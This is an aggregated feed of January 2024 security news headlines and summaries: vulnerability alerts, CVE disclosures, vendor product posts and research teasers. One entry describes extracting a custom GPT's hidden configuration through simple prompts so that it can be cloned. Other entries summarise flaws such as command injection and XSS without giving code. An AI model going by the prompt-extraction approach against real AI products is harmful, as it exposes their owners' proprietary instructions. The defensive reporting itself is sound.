2024-01-30T14:00:00Z | 1706623200

https://www.akamai.com/blog/security/2024/jan/the-web-scraping-problem-part-1
Joe Sandbox v39 Ruby
2024-01-30T08:58:00Z | 1706605080

Today, we are proud to release Joe Sandbox 39 under the code name Ruby! This release is packed with many new detection signatures and important features to make Joe Sandbox even better.Our Joe Sandbox Cloud Pro, Basic, and OEM servers have recently been upgraded to Ruby.If you wish to upgrade your on-premise Joe Sandbox installation right away, please read the Update Guide that you received via our e-mailing list. You can also find the Update Guide in our customer portal. 287 new SignaturesRuby comes with a high number of new Yara and Behavior signatures to detect new malware families like SpectralBlur, PureLand Stealer, KANDYKORN RAT, Hatef Wiper, JaskaGO, Clay Stealer, LambLoad, IronWind, Brook RAT, HazyLoad, PureLog Stealer, LostTrustEncoded, Golden Axe, Tisak and LiveTeam and many more. In addition, we added 5 new Malware Configuration Extractors, e.g. ToxicEye, Neconyd, meduzastealer, poshc2, diceloader to name a few:Improved OCR CapabilitiesFor Phishing Joe Sandbox relays on a rich set of different technologies. OCR (Optical Character Recognition) is one of them. In Joe Sandbox 39 we upgraded the engine to have more precise results. The outcome is better phishing detection - especially for initial phishing lures:Support for Android 13Joe Sandbox Ruby enables analysts to investigate APKs (Android Application Packages) on latest Android 13:Multi-File Submission for macOS and LinuxWe see more and more malware samples which require other files as dependency. If the sample is detonated without the dependencies it won't run and no malicious behavior is analyzed. Joe Sandbox v39 brings now multi-file submission for macOS and Linux. To use multi-file submission simply drag&drop your sample together with the dependencies to the upload mask:Memory Dumping for Apple Silicon (ARM64)Joe Sandbox has brought macOS analysis functionality for Apple Silicon in Joe Sandbox v38. With this release Memory Dumping has been added. Memory dumps greatly increases the chance to detect the malware family:User Menu RedesignIn Ruby we completely redesigned the user menu, making it easier to understand and granting faster access to most important elements of the sandbox:Final WordsIn this blog post, we have presented the most important features of Joe Sandbox Ruby, but there are some other interesting features on top:Added powershell upload scriptAdded PE file section hashAdded automated Cloudflare challenges bypassAdded ETW RPC tracing to improve process treesAdded LOOKUP events for Apple Silicon (ARM64)Added web UI CLI submission supportAdded cookbook command _JBMoveBinLoadingDirectoryAdded support of PROVIDEDBIN placeholder in _JBRunCmd* cookbook commandsImproved DMG extraction and static analysisImproved HTTP session displaying in report HTMLWould you like to try Joe Sandbox? Register for a free account on Joe Sandbox Cloud Basic or contact us for an in-depth technical demo!

https://www.joesecurity.org/blog/7991755081956359540
E-ITSi uus versioon tuleb koos uuenduskuuri läbinud portaaliga
2024-01-30T07:50:32Z | 1706601032

Alates 2. veebruarist kehtib Eesti intoturbestandardi (E-ITS) uus versioon, samuti võttis Riigi Infosüsteemi Amet (RIA) äsja kasutusele uuendatud E-ITSi portaali eits.ria.ee.

https://ria.ee/uudised/e-itsi-uus-versioon-tuleb-koos-uuenduskuuri-labinud-portaaliga
Actively Exploited Vulnerability in Hitron DVRs: Fixed, Patches Available
2024-01-30T06:00:00Z | 1706594400

https://www.akamai.com/blog/security-research/2024/jan/hitron-zero-day-vulnerability-spreading-mirai-patched
Security Alert (A24-01-26): Multiple Vulnerabilities in Juniper Networks Junos OS and Junos OS Evolved
2024-01-30T04:00:00Z | 1706587200

Juniper Networks has published security advisories to address multiple vulnerabilities in Junos OS and Junos OS Evolved.

https://www.govcert.gov.hk/en/alerts_detail.php
Missing signs: how several brands forgot to secure a key piece of Android
2024-01-30T00:00:00Z | 1706572800

We recently discovered that Android devices from multiple major brands sign APEX modules—updatable units of highly-privileged OS code—using private keys from Android’s public source repository. Anyone can forge an APEX update for such a device to gain near-total control over it. Rather than negligence by any particular manufacturer (OEM), we believe that unsafe defaults, poor documentation, and incomplete CTS coverage in the Android Open Source Project (AOSP) were the main causes of this issue.

https://rtx.meta.security/exploitation/2024/01/30/Android-vendors-APEX-test-keys.html
What AI Can Tell You About M&A Risk by Vectra AI Product Team
2024-01-30T00:00:00Z | 1706572800

The Vectra AI platform can help you establish a highly effective data room for a granular view of target company risks..

https://www.vectra.ai/blog/what-ai-can-tell-you-about-m-a-risk
Decoding Mass Exploitation in 2023: A GreyNoise Perspective
2024-01-30T00:00:00Z | 1706572800

Discover the key insights from GreyNoise Labs' report on mass exploitation in 2023, including: Observations on attacker tactics and behaviors: the impact of 242 Common Vulnerabilities & Exposures (CVEs); and, the role of nation-state conflicts in the mass exploitation landscape. Learn how GreyNoise's detection network and research contribute to a safer internet.

https://www.greynoise.io/blog/decoding-mass-exploitation-in-2023-a-greynoise-perspective
How to steal intellectual property from GPTs
2024-01-29T12:10:28Z | 1706530228

A new threat vector discovered by Cato Research could reveal proprietary information about the internal configuration of a GPT, the simple custom agents for ChatGPT. With that information, hackers could clone a GPT and steal one’s business. Extensive resources were not needed to achieve this aim. Using simple prompts, I was able to get all... The post How to steal intellectual property from GPTs  appeared first on Cato Networks.

https://www.catonetworks.com/blog/how-to-steal-intellectual-property-from-gpts/
Kontrolli enne tulude deklareerimist, kas dokumendid kehtivad ja PIN-koodid on olemas
2024-01-29T09:06:45Z | 1706519205

PPA, MTA ja RIA tuletavad meelde, et enne tulude deklareerimist tasub üle kontrollida dokumentide kehtivusaeg ja PIN-koodide olemasolu.

https://ria.ee/uudised/kontrolli-enne-tulude-deklareerimist-kas-dokumendid-kehtivad-ja-pin-koodid-olemas
Keep Your Tech FLAME Alive
2024-01-29T09:00:00Z | 1706518800

https://www.akamai.com/blog/culture/2024/jan/keep-your-tech-flame-alive
Worried About Bot Attacks on B2C APIs? You May Be Missing a Bigger Risk
2024-01-29T06:00:00Z | 1706508000

https://www.akamai.com/blog/security/2024/jan/b2b-apis-present-potentially-devastating-risks
Security Alert (A24-01-24): Multiple Vulnerabilities in Microsoft Edge
2024-01-29T04:00:00Z | 1706500800

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-01-25): Multiple Vulnerabilities in Synology DiskStation Manager
2024-01-29T04:00:00Z | 1706500800

Synology has published security advisories to address multiple vulnerabilities in various versions of DiskStation Manager (DSM).

https://www.govcert.gov.hk/en/alerts_detail.php
Balkan Cybersecurity Days 2024: Call for Speakers Open
2024-01-29T00:00:00Z | 1706486400

Join us for the second edition of Balkan Cybersecurity Days! Organized by DCAF in collaboration with partners AKCESK and FIRST, the event will take place from March 20-22, 2024, in Durrës, Albania. The Call for Speakers for this event is open through February 9th. Interested presenters can learn more at here. Bringing together cybersecurity professionals from the public and private sectors, the agenda includes a high-level opening, a panel on promoting cybersecurity talent, and plenary sessions in response to FIRST’s call for papers. Days two and three feature technical training sessions. #BCD2024

https://www.first.org/newsroom/announce/20240130
CVE-2023-49610
2024-01-26T14:20:00Z | 1706278800

CWE-20: Improper Input Validation MachineSense FeverWarn Raspberry Pi-based devices lack input sanitization, which could allow an attacker on an adjacent network to send a message running commands or could overflow the stack.

https://claroty.com/team82/disclosure-dashboard/cve-2023-49610
CVE-2023-49115
2024-01-26T14:19:00Z | 1706278740

CWE-306: Missing Authentication for Critical Function MachineSense devices use unauthenticated MQTT messaging to monitor devices and remote viewing of sensor data by users.

https://claroty.com/team82/disclosure-dashboard/cve-2023-49115
CVE-2023-47867
2024-01-26T14:19:00Z | 1706278740

CWE-284: Improper Access Control MachineSense FeverWarn devices are configured as Wi-Fi hosts in a way that attackers within range could connect to the device's web services and compromise the device.

https://claroty.com/team82/disclosure-dashboard/cve-2023-47867
CVE-2023-49617
2024-01-26T14:16:00Z | 1706278560

CWE-306: Missing Authentication for Critical Function The MachineSense application programmable interface (API) is improperly protected and can be accessed without authentication. A remote attacker could retrieve and modify sensitive information without any authentication.

https://claroty.com/team82/disclosure-dashboard/cve-2023-49617
CVE-2023-46706
2024-01-26T14:15:00Z | 1706278500

CWE-798: Use of Hard-coded Credentials Multiple MachineSense devices have credentials unable to be changed by the user or administrator. Successful exploitation of this vulnerability could allow an attacker to obtain user data from devices, execute remote code on devices, or gain control over devices to perform malicious actions.

https://claroty.com/team82/disclosure-dashboard/cve-2023-46706
CVE-2023-6221
2024-01-26T14:13:00Z | 1706278380

CWE-306: Missing Authentication for Critical Function The cloud provider MachineSense uses for integration and deployment for multiple MachineSense devices, such as the programmable logic controller (PLC), PumpSense, PowerAnalyzer, FeverWarn, and others is insufficiently protected against unauthorized access. An attacker with access to the internal procedures could view source code, secret credentials, and more.

https://claroty.com/team82/disclosure-dashboard/cve-2023-6221
Enhancing trust for SGX enclaves
2024-01-26T14:00:31Z | 1706277631

Creating reproducible builds for SGX enclaves used in privacy-oriented deployments is a difficult task that lacks a convenient and robust solution. We describe using Nix to achieve reproducible and transparent enclave builds so that anyone can audit whether the enclave is running the source code it claims, thereby enhancing the security of […]

https://blog.trailofbits.com/2024/01/26/enhancing-trust-for-sgx-enclaves/
Atlassian Confluence Server and Data Center Remote Code Execution (CVE-2023-22527) – Cato’s Analysis and Mitigation
2024-01-25T14:10:54Z | 1706191854

Atlassian recently disclosed a new critical vulnerability in its Confluence Server and Data Center product line, the CVE has a CVSS score of 10, and allows an unauthenticated attacker to gain Remote Code Execution (RCE) access on the vulnerable server.  There is no workaround, the only solution being to upgrade to the latest patched versions.... The post Atlassian Confluence Server and Data Center Remote Code Execution (CVE-2023-22527) – Cato’s Analysis and Mitigation  appeared first on Cato Networks.

https://www.catonetworks.com/blog/atlassian-confluence-server-and-data-center-remote-code-execution-cve-2023-22527-catos-analysis-and-mitigation/
We build X.509 chains so you don’t have to
2024-01-25T14:00:22Z | 1706191222

For the past eight months, Trail of Bits has worked with the Python Cryptographic Authority to build cryptography-x509-verification, a brand-new, pure-Rust implementation of the X.509 path validation algorithm that TLS and other encryption and authentication protocols are built on. Our implementation is fast, standards-conforming, and memory-safe, giving the Python ecosystem a modern […]

https://blog.trailofbits.com/2024/01/25/we-build-x-509-chains-so-you-dont-have-to/
What Is API Detection and Response?
2024-01-25T14:00:00Z | 1706191200

https://www.akamai.com/blog/security/2024/jan/what-is-api-detection-and-response
API Security: Best Practices for API Activity Data Acquisition
2024-01-25T14:00:00Z | 1706191200

https://www.akamai.com/blog/security/2024/jan/api-security-best-practices-for-api-activity-data-acquisition
The Industry’s First SASE-based XDR Has Arrived
2024-01-25T10:28:27Z | 1706178507

The post The Industry’s First SASE-based XDR Has Arrived appeared first on Cato Networks.

https://www.catonetworks.com/resources/the-industrys-first-sase-based-xdr-has-arrived/
NCSC for Startups: Playing cyber criminals at their own game
2024-01-25T08:44:30Z | 1706172270

CounterCraft's co-founder, Dan Brett, explains how they turn the tables so that social engineering can be used to protect organisations from attackers.

https://www.ncsc.gov.uk/blog-post/playing-cyber-criminals-own-game
Uus riiklik infoteenus pakub tuge Eestis kohanemisel
2024-01-25T06:53:37Z | 1706165617

Riigiportaalist eesti.ee leitav teenus „Eestis kohanemine“ koondab ühte kohta kogu vajaliku info uussisserändajatele mõeldud olemasolevatest teenustest. Infoteenus on üles ehitatud teekaardina, mis juhatab inimese ühe teenuse juurest teise juurde ning aitab samas suurt pilti silme ees hoida.

https://ria.ee/uudised/uus-riiklik-infoteenus-pakub-tuge-eestis-kohanemisel
Security Alert (A24-01-23): Multiple Vulnerabilities in Cisco Products
2024-01-25T04:00:00Z | 1706155200

Cisco released security advisories to address multiple vulnerabilities in Cisco products.

https://www.govcert.gov.hk/en/alerts_detail.php
Celebrating our 2023 open-source contributions
2024-01-24T14:00:22Z | 1706104822

At Trail of Bits, we pride ourselves on making our best tools open source, such as Slither, PolyTracker, and RPC Investigator. But while this post is about open source, it’s not about our tools… In 2023, our employees submitted over 450 pull requests (PRs) that were merged into non-Trail of Bits repositories. This demonstrates our […]

https://blog.trailofbits.com/2024/01/24/celebrating-our-2023-open-source-contributions/
Integrating mPulse?s Beacon API with EdgeWorkers to Visualize All Client Requests
2024-01-24T14:00:00Z | 1706104800

Akamai mPulse combines with Akamai EdgeWorkers to visualize any client request and uses its http-request module to let users send their own requests.

https://www.akamai.com/blog/edge/2024/jan/integrating-mpulses-beacon-api-edgeworkers-visualize-client-requests
CVE-2023-7238
2024-01-24T12:41:00Z | 1706100060

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') A XSS payload can be uploaded as a DICOM study and when a user tries to view the infected study inside the Osimis WebViewer the XSS vulnerability gets triggered. If exploited, the attacker will be able to execute arbitrary JavaScript code inside the victim's browser.

https://claroty.com/team82/disclosure-dashboard/cve-2023-7238
Security Alert (A24-01-21): Multiple Vulnerabilities in Google Chrome
2024-01-24T04:00:00Z | 1706068800

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-01-22): Multiple Vulnerabilities in Firefox
2024-01-24T04:00:00Z | 1706068800

Mozilla has published the advisories (MFSA2024-01 and MFSA2024-02) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
The Hidden Risks of SMS-Based Multi-Factor Authentication by Lucie Cardiet
2024-01-24T00:00:00Z | 1706054400

Explore a real-world Amazon account takeover scenario underscoring the vulnerabilities in SMS-based MFA and advocating for more robust security measures.

https://www.vectra.ai/blog/the-hidden-risks-of-sms-based-multi-factor-authentication
Hiding payloads in Java source code strings
2024-01-23T15:00:00Z | 1706022000

In this post we'll show you how Java handles unicode escapes in source code strings in a way you might find surprising - and how you can abuse them to conceal payloads. We recently released a powerful

https://portswigger.net/research/hiding-payloads-in-java-source-code-strings
Atualização de Fascículos da Cartilha de Segurança para Internet
2024-01-23T13:00:00Z | 1706014800

Lançadas versões atualizadas dos Fascículos da Cartilha de Segurança para Internet, elaborados com a contribuição da ANPD: - Fascículo Proteção de Dados - Fascículo Vazamento de Dados

https://cartilha.cert.br/
CVE-2023-6926
2024-01-23T12:34:00Z | 1706013240

CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') There is an OS command injection vulnerability in Crestron AM-300 firmware version 1.4499.00018 which may enable a user of a limited-access SSH session to escalate their privileges to root-level access.

https://claroty.com/team82/disclosure-dashboard/cve-2023-6926
Cato Taps Generative AI to Improve Threat Communication
2024-01-23T12:30:00Z | 1706013000

Today, Cato is furthering our goal of simplifying security operations with two important additions to Cato SASE Cloud. First, we’re leveraging generative AI to summarize all the indicators related to a security issue. Second, we tapped ML to accelerate the identification and ranking of threats by finding similar past threats across an individual customer’s account... The post Cato Taps Generative AI to Improve Threat Communication appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-taps-generative-ai-to-improve-threat-communication/
Cato XDR: A SASE-based Approach to Threat Detection and Response
2024-01-23T12:30:00Z | 1706013000

Security Analysts Need Better Tools  Security analysts continue to face an ever-evolving threat landscape, and their traditional approaches are proving to be quite limited.  They continue to be overrun with security alerts, and their SIEMs often fail to properly correlate all relevant data, leaving them more exposed to cyber threats.  These analysts require a more... The post Cato XDR: A SASE-based Approach to Threat Detection and Response appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-xdr-a-sase-based-approach-to-threat-detection-and-response/
Cato Networks Unveils Groundbreaking SASE-based XDR & EPP: Insights from Partners
2024-01-23T12:30:00Z | 1706013000

An Exclusive Interview with Art Nichols and Niko O’Hara  In the ever-evolving landscape of cybersecurity, Cato Networks introduced the world’s first SASE-based extended detection and response (XDR) and the first SASE-managed endpoint protection platform (EPP).   This Cato SASE Cloud platform marks a significant milestone in the industry’s journey towards a more secure, converged, and responsive... The post Cato Networks Unveils Groundbreaking SASE-based XDR & EPP: Insights from Partners   appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-unveils-groundbreaking-sase-based-xdr-epp-insights-from-partners/
Cato XDR Proves to Be a “Timesaver” for Redner’s Markets
2024-01-23T12:30:00Z | 1706013000

“The Cato platform gave us better visibility, saved time on incident response, resolved application issues, and improved network performance ten-fold.”   Nick Hidalgo, Vice President of IT and Infrastructure at Redner’s Markets  At what point do security problems meet network architecture issues? For U.S. retailer Redner’s Markets, it was when the company’s firewall vendor required backhauling... The post Cato XDR Proves to Be a “Timesaver” for Redner’s Markets appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-xdr-proves-to-be-a-timesaver-for-redners-markets/
The National Cyber Security Centre Finland’s weekly review – 03/2024
2024-01-23T10:20:02Z | 1706005202

This week, we provide information about bank credential phishing campaigns, the cyber security of elections and deepfakes and how to spot them.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-032024
The National Cyber Security Centre Finland’s weekly review – 03/2024
2024-01-23T10:20:02Z | 1706005202

This week, we provide information about bank credential phishing campaigns, the cyber security of elections and deepfakes and how to spot them.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-032024
High Threat Security Alert (A24-01-20): Multiple Vulnerabilities in Apple iOS and iPadOS
2024-01-23T04:00:00Z | 1705982400

Apple has released iOS 15.8.1, iOS 16.7.5, iOS 17.3, iPadOS 15.8.1, iPadOS 16.7.5 and iPadOS 17.3 to fix the vulnerabilities in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
What is Malware and its types?
2024-01-22T06:56:30Z | 1705906590

The term “malicious software” is shortened to “malware.” Malware is invasive software that is purposefully

https://virtualattacks.com/what-is-malware-and-its-types/
High Threat Security Alert (A24-01-19): Vulnerability in Ivanti Endpoint Manager Mobile (MobileIron Core)
2024-01-22T04:00:00Z | 1705896000

Ivanti has published a security advisory to address a vulnerability in Ivanti Endpoint Manager Mobile.

https://www.govcert.gov.hk/en/alerts_detail.php
Consulta pública: Projeto de Regulamento relativo à implementação do Regime Jurídico da Segurança do Ciberespaço nas entidades da AP
2024-01-22T00:00:00Z | 1705881600

Está disponível para consulta pública o Projeto de Regulamento relativo à implementação do Regime Jurídico da Segurança do Ciberespaço nas entidades da Administração Pública, aprovado pelo Centro Nacional de Cibersegurança.O projeto pode ser consultado online e os comentários enviados, por escrito e em língua portuguesa, preferencialmente para o endereço eletrónico drsc@cncs.gov.pt, até 05 de março de 2024.O presente projeto de regulamento estabelece, nos termos do n.º 7 do artigo 3.º do Decreto-Lei n.º 65/2021, de 30 de julho, as condições específicas para o cumprimento de requisitos de segurança das redes e sistemas de informação por parte das entidades da Administração Pública, em termos proporcionais e adequados à sua dimensão ou complexidade organizacional.   Uma vez encerrada a consulta pública, o Centro Nacional de Cibersegurança vai proceder à apreciação dos contributos apresentados pelos interessados. Após este processo, o CNCS vai divulgar um relatório que reúna os contributos recebidos, bem como uma apreciação global que reflita o entendimento sobre os mesmos e os fundamentos das opções tomadas.

https://dyn.cncs.gov.pt/pt/detalhe/art/135822/consulta-publica-projeto-de-regulamento-relativo-a-implementacao-do-regime-juridico-da-seguranca-do-ciberespaco-nas-entidades-da-ap
The Confusing History of F5 BIG-IP RCE Vulnerabilities
2024-01-22T00:00:00Z | 1705881600

If you want to know way too much about attacks against F5 BIG-IP devices, then this is the blog for you!

https://www.greynoise.io/blog/the-confusing-history-of-f5-big-ip-rce-vulnerabilities
התמודדות מול איומי סייבר בראי “חרבות ברזל”
2024-01-21T10:26:49Z | 1705832809

The post התמודדות מול איומי סייבר בראי “חרבות ברזל” appeared first on Radiflow.

https://www.pc.co.il/upcoming-conferences/401193/#new_tab
The Future of SASE: What’s Next for CIOs and CISOs – Webinar with Gartner’s Neil MacDonald
2024-01-21T07:54:21Z | 1705823661

The post The Future of SASE: What’s Next for CIOs and CISOs – Webinar with Gartner’s Neil MacDonald appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-the-future-of-sase-whats-next-for-cios-and-cisos
Blocking Shodan by Vectra AI Security Research team
2024-01-20T00:00:00Z | 1705708800

Explore the pervasive impact of Shodan on network security, from its origin to its contemporary applications in cybersecurity.

https://www.vectra.ai/blog/blocking-shodan
What is meant by “cybersecurity”?
2024-01-19T16:04:03Z | 1705680243

The process of protecting networks, computers, servers, mobile devices, electronic systems, and data from malicious

https://virtualattacks.com/what-is-meant-by-cybersecurity/
Ransomware darkened the cyber weather of December
2024-01-19T10:29:04Z | 1705660144

The year 2023 ended on a rainy note in terms of cyber security. Even lightning was in the air when National Cyber Security Centre Finland received six reports in total of the Akira ransomware. The number of data breaches with serious consequences also increased in December.

https://www.kyberturvallisuuskeskus.fi/en/fi/ajankohtaista/kybersaa_12/2023
Ransomware darkened the cyber weather of December
2024-01-19T10:29:04Z | 1705660144

The year 2023 ended on a rainy note in terms of cyber security. Even lightning was in the air when National Cyber Security Centre Finland received six reports in total of the Akira ransomware. The number of data breaches with serious consequences also increased in December.

https://www.kyberturvallisuuskeskus.fi/en/fi/ajankohtaista/kybersaa_12/2023
Our thoughts on AIxCC’s competition format
2024-01-18T14:00:38Z | 1705586438

Late last month, DARPA officially opened registration for their AI Cyber Challenge (AIxCC). As part of the festivities, DARPA also released some highly anticipated information about the competition: a request for comments (RFC) that contained a sample challenge problem and the scoring methodology. Prior rules documents and FAQs released by DARPA painted […]

https://blog.trailofbits.com/2024/01/18/our-thoughts-on-aixccs-competition-format/
Whistleblowers of a Fake SASE are IT’s Best Friends
2024-01-18T10:11:30Z | 1705572690

History taught us that whistleblowers can expose the darkest secrets and wrongdoing of global enterprises, governments and public services; even prime ministers and presidents. Whistleblowers usually have a deep sense of justice and responsibility that drives them to favor the good of the many over their own. Often, their contribution is really appreciated only in... The post Whistleblowers of a Fake SASE are IT’s Best Friends  appeared first on Cato Networks.

https://www.catonetworks.com/blog/whistleblowers-of-a-fake-sase-are-its-best-friends/
High Threat Security Alert (A24-01-17): Multiple Vulnerabilities in Microsoft Edge
2024-01-18T04:00:00Z | 1705550400

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-01-18): Vulnerability in Drupal
2024-01-18T04:00:00Z | 1705550400

Drupal published a security advisory to address a vulnerability in the Drupal products.

https://www.govcert.gov.hk/en/alerts_detail.php
Ivanti Connect Secure Exploited to Install Cryptominers
2024-01-18T00:00:00Z | 1705536000

Our first-hand observations of how attackers leverage CVE-2023-46805 and CVE-2024-21887 to install cryptocurrency miners.

https://www.greynoise.io/blog/ivanti-connect-secure-exploited-to-install-cryptominers
Cooperation between the authorities ensures secure elections
2024-01-17T13:45:06Z | 1705499106

The year 2024 will be a major election year both in Finland and around the world. Preparing for the presidential election and the European elections entails long-term work by several different operators, from ministries and agencies all the way to the level of municipalities and individual polling stations. Although international tensions may cause concern among citizens, the Finnish election system is stable and secure.

https://www.kyberturvallisuuskeskus.fi/en/news/cooperation-between-authorities-ensures-secure-elections
Cooperation between the authorities ensures secure elections
2024-01-17T13:45:06Z | 1705499106

The year 2024 will be a major election year both in Finland and around the world. Preparing for the presidential election and the European elections entails long-term work by several different operators, from ministries and agencies all the way to the level of municipalities and individual polling stations. Although international tensions may cause concern among citizens, the Finnish election system is stable and secure.

https://www.kyberturvallisuuskeskus.fi/en/news/cooperation-between-authorities-ensures-secure-elections
30 new Semgrep rules: Ansible, Java, Kotlin, shell scripts, and more
2024-01-17T13:30:32Z | 1705498232

We are publishing a set of 30 custom Semgrep rules for Ansible playbooks, Java/Kotlin code, shell scripts, and Docker Compose configuration files. These rules were created and used to audit for common security vulnerabilities in the listed technologies. This new release of our Semgrep rules joins our public CodeQL […]

https://blog.trailofbits.com/2024/01/17/30-new-semgrep-rules-ansible-java-kotlin-shell-scripts-and-more/
The National Cyber Security Centre Finland’s weekly review – 02/2024
2024-01-17T10:35:50Z | 1705487750

This week, we provide information on software vulnerabilities in Ivanti products, which affect hundreds of Finnish servers. Also prominent in the reports submitted to the NCSC-FI this week have been Akira ransomware attacks and MyTax scams.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-022024
The National Cyber Security Centre Finland’s weekly review – 02/2024
2024-01-17T10:35:50Z | 1705487750

This week, we provide information on software vulnerabilities in Ivanti products, which affect hundreds of Finnish servers. Also prominent in the reports submitted to the NCSC-FI this week have been Akira ransomware attacks and MyTax scams.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-022024
CVE-2024-21473
2024-01-17T09:26:00Z | 1705483560

This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Synology RT6600ax routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the Qualcomm LDB service. The issue results from the lack of proper validation of user-supplied data prior to further processing. An attacker can leverage this vulnerability to execute code in the context of root. Qualcomm fixed the issue in a customer-only security update on January 1st, 2024.

https://claroty.com/team82/disclosure-dashboard/cve-2024-21473
3 Things CISOs Can Immediately Do with Cato
2024-01-17T09:22:22Z | 1705483342

Wherever you are in your SASE or SSE journey, it can be helpful knowing what other CISOs are doing once they’ve implemented these platforms. Getting started with enhanced security is a lot easier than you might think. With Cato’s security services being delivered from a scalable cloud-native architecture at multiple global points of presence, the... The post 3 Things CISOs Can Immediately Do with Cato appeared first on Cato Networks.

https://www.catonetworks.com/blog/3-things-cisos-can-immediately-do-with-cato/
SFPMonitor.sys KOOB Write vulnerability
2024-01-17T06:23:46Z | 1705472626

SonicWall Capture Client version 3.7.10 and NetExtender Client Windows client 10.2.337 and earlier versions are being installed with sfpmonitor.sys driver. The client applications communicate with the driver through queries. The driver method that handles those queries has Stack-based Buffer Overflow vulnerability that allows an attacker to craft a specific query to overwrite kernel memory, causing Denial of Service (DoS) which potentially leads to code execution in the target operating system. SonicWall strongly recommends that users of Capture Client and SSL VPN NetExtender client upgrade to the latest release version. - To perform the upgrade for NetExtender, it is necessary to uninstall the vulnerable version first and then install the new version.- Update: Latest NetExtender Windows 10.2.339 has been released that addresses the 'necessary uninstall' issue. CVE: CVE-2023-6340 Last updated: Feb. 7, 2024, 3:43 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0019
High Threat Security Alert (A24-01-13): Multiple Vulnerabilities in Google Chrome
2024-01-17T04:00:00Z | 1705464000

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A24-01-14): Multiple Vulnerabilities in Citrix Product
2024-01-17T04:00:00Z | 1705464000

Citrix published security advisories to address multiple vulnerabilities in Citrix products.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A24-01-15): Vulnerability in VMware Aria Automation
2024-01-17T04:00:00Z | 1705464000

VMware published a security advisory to address a vulnerability in VMware Aria Automation.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-01-16): Multiple Vulnerabilities in Oracle Java and Oracle Products (January 2024)
2024-01-17T04:00:00Z | 1705464000

Oracle released a Critical Patch Update (CPU) Advisory with collections of patches to address multiple vulnerabilities in Java SE and various Oracle products.

https://www.govcert.gov.hk/en/alerts_detail.php
LeftoverLocals: Listening to LLM responses through leaked GPU local memory
2024-01-16T17:00:39Z | 1705424439

We are disclosing LeftoverLocals: a vulnerability that allows recovery of data from GPU local memory created by another process on Apple, Qualcomm, AMD, and Imagination GPUs. LeftoverLocals impacts the security posture of GPU applications as a whole, with particular significance to LLMs and ML models run on impacted GPU […]

https://blog.trailofbits.com/2024/01/16/leftoverlocals-listening-to-llm-responses-through-leaked-gpu-local-memory/
Reduce API Security Risk by Fixing Runtime Threats in Code Faster
2024-01-16T14:00:00Z | 1705413600

https://www.akamai.com/blog/security/2024/jan/reduce-api-security-risk-fixing-runtime-threats-in-code-faster
Cursos CERT.br: Inscrições 2024 Abertas
2024-01-16T12:16:18Z | 1705407378

Estão abertas as inscrições para as turmas 2024 dos cursos ministrados pelo CERT.br: https://cursos.cert.br/inscricao/ Em 2024 o CERT.br ministrará os seguintes cursos: Overview of Creating and Managing CSIRTs Foundations of Incident Management Advanced Topics in Incident Handling

https://cursos.cert.br/inscricao/
Radiflow to develop rich asset data discovery on ServiceNow OTM platform
2024-01-16T11:31:09Z | 1705404669

The post Radiflow to develop rich asset data discovery on ServiceNow OTM platform appeared first on Radiflow.

https://industrialcyber.co/news/radiflow-to-develop-rich-asset-data-discovery-on-servicenow-otm-platform/
Landing at the NCSC (glad I brought my towel)
2024-01-16T10:22:15Z | 1705400535

Ollie Whitehouse, the NCSC’s new Chief Technology Officer, outlines the cyber security challenges he’ll be prioritising.

https://www.ncsc.gov.uk/blog-post/landing-at-the-ncsc-glad-i-brought-my-towel
Prefix Truncation Attacks in SSH Specification (Terrapin Attack)
2024-01-16T06:37:34Z | 1705387054

On December 18th, 2023, researchers from the Ruhr University Bochum published a protocol flaw in the SSH v2 protocol, called Terrapin Attack. The flaw allows removing encrypted SSH messages at the begin of the communication, allowing downgrade of security aspects of SSH connections. This occurs because the SSH Binary Packet Protocol (BPP), mishandles the handshake phase, and mishandles use of sequence numbers. To carry out the Terrapin attack, a threat actor must be capable of performing a man-in-the-middle (MITM) attack at the network layer. Another precondition is that the connection must be secured by either ChaCha20-Poly1305 or CBC with Encrypt-then-MAC. SonicWall is investigating its product line to determine which products and services may be affected by this vulnerability and the Affected and Fixed Products(s) can change as more information becomes available. CVE: CVE-2023-48795 Last updated: June 4, 2024, 6:37 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0002
High Threat Security Alert (A24-01-11): Multiple Vulnerabilities in Juniper Networks Junos OS and Junos OS Evolved
2024-01-16T04:00:00Z | 1705377600

Juniper Networks has published security advisories to address multiple vulnerabilities in Junos OS and Junos OS Evolved.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A24-01-12): Multiple Vulnerabilities in GitLab
2024-01-16T04:00:00Z | 1705377600

GitLab has released 16.5.6, 16.6.4 and 16.7.2 to address multiple vulnerabilities in various versions of GitLab..

https://www.govcert.gov.hk/en/alerts_detail.php
Internet freedom with the Open Technology Fund
2024-01-15T13:30:54Z | 1705325454

